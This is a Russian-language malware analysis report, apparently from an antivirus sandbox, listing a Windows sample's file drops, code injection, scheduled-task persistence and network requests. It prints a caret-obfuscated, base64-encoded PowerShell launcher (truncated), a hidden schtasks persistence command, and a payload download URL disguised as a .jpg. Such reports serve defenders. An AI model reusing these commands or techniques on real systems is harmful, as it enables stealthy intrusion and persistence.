Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\dzqhttcrei
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^ll -E WwBTAHkAUwBUAEUAbQAuAHQARQBYAFQALgBlAG4AQwBPAGQAaQBuAGcAXQA6ADoAdQBuAEkAYwBPAEQARQAuAGcAZQBUAHMAVABSAGkATgBnACgAWwBTAHkAcwB0AEUATQAuAEMATwBOAHYAZQByAFQAXQA6ADoARgBSAG8ATQBi...
Внедряет код в
следующие пользовательские процессы:
- snqt7rmrzsqv.exe
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\bitfad2.tmp
- %APPDATA%\dzqhttcrei.exe
- %TEMP%\tmp3f5c.tmp
- %TEMP%\7d1d6c755c\log.txt
Присваивает атрибут 'скрытый' для следующих файлов
- %HOMEPATH%\bitfad2.tmp
Удаляет следующие файлы
- %TEMP%\tmp3f5c.tmp
Перемещает следующие файлы
- %HOMEPATH%\bitfad2.tmp в %HOMEPATH%\snqt7rmrzsqv.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://go###izm.com/wp-content/themes/busify/tr/855107306.jpg
- http://ap#.#pify.org/
UDP
- DNS ASK go###izm.com
- DNS ASK ap#.#pify.org
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\snqt7rmrzsqv.exe'
- '<SYSTEM32>\cmd.exe' /C PO^W^ERs^HE^ll -E WwBTAHkAUwBUAEUAbQAuAHQARQBYAFQALgBlAG4AQwBPAGQAaQBuAGcAXQA6ADoAdQBuAEkAYwBPAEQARQAuAGcAZQBUAHMAVABSAGkATgBnACgAWwBTAHkAcwB0AEUATQAuAEMATwBOAHYAZQByAFQAXQA6ADoARgBSAG8ATQBi...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\DzQhtTCrEi" /XML "%TEMP%\tmp3F5C.tmp"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E WwBTAHkAUwBUAEUAbQAuAHQARQBYAFQALgBlAG4AQwBPAGQAaQBuAGcAXQA6ADoAdQBuAEkAYwBPAEQARQAuAGcAZQBUAHMAVABSAGkATgBnACgAWwBTAHkAcwB0AEUATQAuAEMATwBOAHYAZQByAFQAXQA6ADoARgBSAG8ATQBiAGEAUwBlADYANABTAF...
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\DzQhtTCrEi" /XML "%TEMP%\tmp3F5C.tmp"
